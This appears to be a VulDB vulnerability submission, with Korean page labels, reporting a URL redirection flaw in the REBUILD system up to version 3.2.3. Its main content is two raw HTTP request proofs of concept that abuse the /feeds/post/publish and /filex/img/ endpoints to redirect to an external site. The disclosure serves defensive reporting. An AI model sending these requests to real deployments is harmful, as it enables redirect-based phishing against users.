| 제목 | A URL redirection vulnerability exists in the/file/img/* * interface of the REBUILD system |
|---|
| 설명 | Suggested description:
URL Redirection vulnerability exists in rebuild <=3.2.3
Vulnerability Type:
URL Redirection
Vendor of Product:
https://github.com/getrebuild/rebuild
Affected Product Code Base:
<=3.2.3
Affected Component:
/feeds/post/publish
/filex/img/**
Attack Type:
Remote
Request message 1:
```
POST /feeds/post/publish HTTP/1.1
Host: 192.168.0.102:18080
Content-Length: 112
X-AuthToken:
Accept: */*
X-CsrfToken:
X-Requested-With: XMLHttpRequest
X-Client: RB/WEB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Origin: http://192.168.0.102:18080
Referer: http://192.168.0.102:18080/feeds/home
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.113967341.1678976466; rb.sidebarCollapsed=false; JSESSIONID=B51949A25F4A795D30CE4B6D7EB82380; _ga_CC8EXS9BLD=GS1.1.1679246509.11.1.1679246516.0.0.0
Connection: close
{"content":"333","images":["http://www.baidu.com"],"scope":"ALL","type":1,"metadata":{"entity":"Feeds"}}
```
Request message 2:
```
GET /filex/img/http://www.baidu.com?imageView2/2/w/300/interlace/1/q/100 HTTP/1.1
Host: 192.168.0.102:18080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.0.102:18080/feeds/home
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.113967341.1678976466; rb.sidebarCollapsed=false; JSESSIONID=B51949A25F4A795D30CE4B6D7EB82380; _ga_CC8EXS9BLD=GS1.1.1679246509.11.1.1679246516.0.0.0
Connection: close
``` |
|---|
| 원천 | ⚠️ https://github.com/getrebuild/rebuild/issues/596 |
|---|
| 사용자 | Mechoy (UID 41579) |
|---|
| 제출 | 2023. 03. 19. PM 06:19 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 03. 23. PM 07:46 (4 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 223744 [Rebuild 까지 3.2.3 /feeds/post/publish 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 20 |
|---|